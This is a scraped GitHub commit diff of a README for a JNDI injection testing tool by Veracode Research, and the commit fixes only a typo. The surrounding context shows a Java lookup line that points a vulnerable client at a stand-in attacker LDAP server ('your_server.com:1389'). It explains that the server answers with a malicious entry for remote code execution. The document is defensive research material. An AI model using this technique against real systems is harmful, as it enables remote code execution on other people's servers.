|
|
|
@ -7,7 +7,7 @@ In order to perform an attack, you can start these servers localy and then trigg |
|
|
|
```java |
|
|
|
```java |
|
|
|
InitialContext.lookup("ldap://your_server.com:1389/o=reference"); |
|
|
|
InitialContext.lookup("ldap://your_server.com:1389/o=reference"); |
|
|
|
``` |
|
|
|
``` |
|
|
|
It will initiate a connection from the vulnerable clinet to the local LDAP server. |
|
|
|
It will initiate a connection from the vulnerable client to the local LDAP server. |
|
|
|
Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution. |
|
|
|
Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution. |
|
|
|
|
|
|
|
|
|
|
|
### Motivation |
|
|
|
### Motivation |
|
|
|
@ -81,4 +81,4 @@ This software is provided solely for educational purposes and/or for testing sys |
|
|
|
* An article about [Exploiting JNDI Injections in Java](https://www.veracode.com/blog/research/exploiting-jndi-injections-java) in the Veracode Blog |
|
|
|
* An article about [Exploiting JNDI Injections in Java](https://www.veracode.com/blog/research/exploiting-jndi-injections-java) in the Veracode Blog |
|
|
|
|
|
|
|
|
|
|
|
### Authors |
|
|
|
### Authors |
|
|
|
[Michael Stepankin](https://twitter.com/artsploit), Veracode Research |
|
|
|
[Michael Stepankin](https://twitter.com/artsploit), Veracode Research |
|
|
|
|
Michael Stepankin
6 years ago
committed by
GitHub